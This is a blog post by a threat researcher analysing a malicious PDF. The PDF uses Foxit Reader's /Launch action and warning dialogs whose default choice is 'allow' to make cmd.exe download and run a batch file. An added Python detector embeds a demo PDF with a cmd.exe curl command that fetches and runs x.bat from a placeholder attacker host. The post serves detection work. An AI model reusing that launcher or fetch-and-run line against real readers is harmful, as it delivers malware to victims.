Shortly after my EXPMON Public announcement on April 7, I was notified by a malware researcher that he/she had submitted a PDF sample and it was detected as red (Malicious). The Detection Details even say that it’s potentially a “zero-day”.
(P.S. I don’t check the system often; if you’re a user and happen to find something, you can ping me on Twitter/X or email me at [email protected])
Check out the original submission here.
https://pub.expmon.com/analysis/15986/
Looking into the details, you will note that there’s an “Indicator” called “suspicious process created by main”, detected in the environment named “win7sp1(update20180524)_foxitreader(2023.2.0.21408)[foxitreader]”.
Technically speaking, this means that the system detected a suspicious process created by the main process (in this env, the Foxit Reader process) in the env that runs Foxit Reader version 2023.2.0.21408 on Windows 7, and that our Detection Logic concluded that this is potentially a zero-day exploit, as the Detection Details say:
Malicious – exploitation activity detected in newer environment, potential zero-day attack
You know, if the system reports a “zero-day” detection, I have an obligation to analyze the sample manually. So I downloaded the sample from the system and tested it in a local env with the latest Foxit Reader installed. Here are the details.
When I opened the PDF file with Foxit Reader, I got the following security warning dialog.
In the background, there’s no suspicious process running. Looks like no problem? However, if you look at it carefully, you will find that the *default option* for this dialog is “Trust this document one time only – OK”. That means a careless user who clicks the “OK” button (or simply presses the “Enter” key) ignores the security warning. And that’s exactly what our system “simulates” in the sandbox environment for this sample.
Let’s go ahead. After the first security warning dialog, I got a second one, shown below:
In the background, there’s still no suspicious process running at this moment. But this 2nd warning dialog has the same bad UI design: the *default option* for this dialog is “Open”, instead of “Do Not Open”. That means a careless user who clicks “Open” (or simply presses the “Enter” key) ignores this security warning, again.
After I clicked “Open” on the 2nd warning dialog, I observed a “cmd.exe” process running with malicious parameters.
Apparently, it’s trying to download a .bat file from an attacker-controlled server and execute it.
If we look into the content of the PDF sample, we can confirm our dynamic analysis and find that this is actually a very simple (but malicious) PDF sample.
Image copied directly from @SquiblydooBlog’s tweet
It has a lot of ‘:’ characters at the beginning of the file; I personally guess this is for bypassing some static-analysis anti-virus software.
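As an added example (not the original sample and not EXPMON’s or the author’s code), here is a small static check that reproduces the two observations above: it measures how much padding precedes the %PDF header, walks the objects looking for /Launch actions, and pulls out the /F target and /P command line so a cmd.exe launcher can be flagged without opening the file in a reader. The embedded PDF is constructed for the demo; its leading ‘:’ run and its command line (a placeholder pointing at attacker.invalid) stand in for the real sample’s content, which is only shown as an image in the post.

```python
import re

# Constructed demo input, NOT the real submission. It imitates the two traits
# described in the post: a run of ':' bytes before the %PDF header and an
# /OpenAction that is a /Launch of cmd.exe. The command line is a placeholder.
SAMPLE_PDF = (
    b":" * 64
    + b"%PDF-1.7\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Action /S /Launch /Win << /F (cmd.exe) "
    b"/P (/c curl -o x.bat http://attacker.invalid/x.bat & x.bat) >> >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

# A constructed benign document for comparison: header at offset 0, no actions.
CLEAN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

# Interpreters that a /Launch action should never legitimately need.
SHELL_BINARIES = {
    "cmd.exe", "cmd", "powershell.exe", "powershell", "pwsh.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
}

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")


def _string_key(key: bytes):
    # Matches "/Key (literal string)"; handles escaped parentheses, not nested ones,
    # and not hex strings (<...>), which is enough for this demo's indirect objects.
    return re.compile(rb"/" + key + rb"\s*\(((?:[^()\\]|\\.)*)\)", re.S)


FILE_RE = _string_key(b"F")    # target of the launch (/F or /Win << /F ... >>)
PARAMS_RE = _string_key(b"P")  # command-line parameters (/Win << /P ... >>)


def pdf_header_offset(data: bytes) -> int:
    """Byte offset of the %PDF- header, or -1 if absent.

    Readers tolerate junk before the header, which is what the ':' padding
    relies on: a scanner that only looks at the first bytes sees no PDF magic.
    """
    return data.find(b"%PDF-")


def find_launch_actions(data: bytes) -> list:
    """Return every indirect object whose /S is /Launch, with its /F and /P strings."""
    hits = []
    for m in OBJ_RE.finditer(data):
        body = m.group(2)
        if not LAUNCH_RE.search(body):
            continue
        f = FILE_RE.search(body)
        p = PARAMS_RE.search(body)
        hits.append({
            "obj": int(m.group(1)),
            "file": f.group(1).decode("latin-1") if f else "",
            "params": p.group(1).decode("latin-1") if p else "",
        })
    return hits


def is_shell_launch(hit: dict) -> bool:
    """True when the launch target's basename is a script/command interpreter."""
    base = re.split(r"[\\/]", hit["file"])[-1].lower()
    return base in SHELL_BINARIES


def scan(data: bytes) -> dict:
    """Combine the header-offset check and the /Launch inspection into one verdict."""
    offset = pdf_header_offset(data)
    launches = find_launch_actions(data)
    if any(is_shell_launch(h) for h in launches):
        verdict = "malicious"      # a document that wants to run a shell
    elif launches or offset != 0:
        verdict = "suspicious"     # any /Launch, or padding before the header
    else:
        verdict = "clean"
    return {"header_offset": offset, "launch": launches, "verdict": verdict}


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_PDF), ("clean", CLEAN_PDF)):
        print(name, scan(doc))
```

The header-offset check is deliberately a weak signal on its own (some legitimate generators prepend a few bytes), while a /Launch whose target resolves to cmd.exe is treated as decisive; the two together describe exactly the sample discussed here. A production scanner would also need to decompress object streams and resolve indirect references, which this demo does not attempt.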
Please note that I tested the sample on Adobe Reader too, as our EXPMON system did as well (as of the current standard version, every .pdf sample is tested in both Adobe Reader and Foxit Reader). On Adobe Reader, the attempt to run external commands (through “/Launch”) is totally disabled. So this malicious sample is harmless on Adobe Reader.
Is this a zero-day exploit?
Well, strictly speaking, by definition this is indeed a PDF zero-day exploit, as it works on the latest Foxit Reader (version 2024.1.0.23997 as of writing). However, it is somewhat of a “lame” one, because the user/victim needs to “allow it” twice to achieve code execution. The key point here is that the default options for these two security warning dialogs are both “allow”, which increases the possibility of successful exploitation (for careless users). That’s what this “zero-day” sample is trying to exploit, as our analysis shows.
Therefore, I wouldn’t consider the EXPMON system’s detection of this sample as a “zero-day” an FP (false positive). Instead, I consider it a success story. :)
So, stay safe & be vigilant, Foxit Reader users! I will forward this blog post to the vendor of Foxit Reader. If they have any update, say fixing the bad design of the dialogs, I will update here.
Additional Information
As of writing, on VT, this sample has a 10/60 detection ratio.
The sample was first seen on VT on March 3, 2024.
I also just got this threat-intel-related information from the original sample submitter, @SquiblydooBlog:
“it came in an email pretending to be a South Korean legal group, it also contained a few other malicious payloads.”
It seems to me that the threat actor (TA) has been trying to leverage this “zero-day” to target Foxit Reader users in South Korea. But please note that this is just my personal impression based on the information I have.
Conclusion
I hope that through this quick analysis of a real-world example, security defenders in this community will better understand how the EXPMON system can help in fighting advanced zero-day or unknown exploits.
I also encourage users to look at the “Indicators” the system produces; they are very helpful information. Sometimes, even when the Overall Detection Result says “Clean/Undetected”, you may still find some suspicious information in the Indicators.
As a side note, if you’re a pro, you can also use our helper tool expmon_sample_submit.py to submit samples. There are some advantages to using the tool: not only can it do a lot of submissions automatically, it can also obtain accurate raw analysis logs, and sometimes that information helps.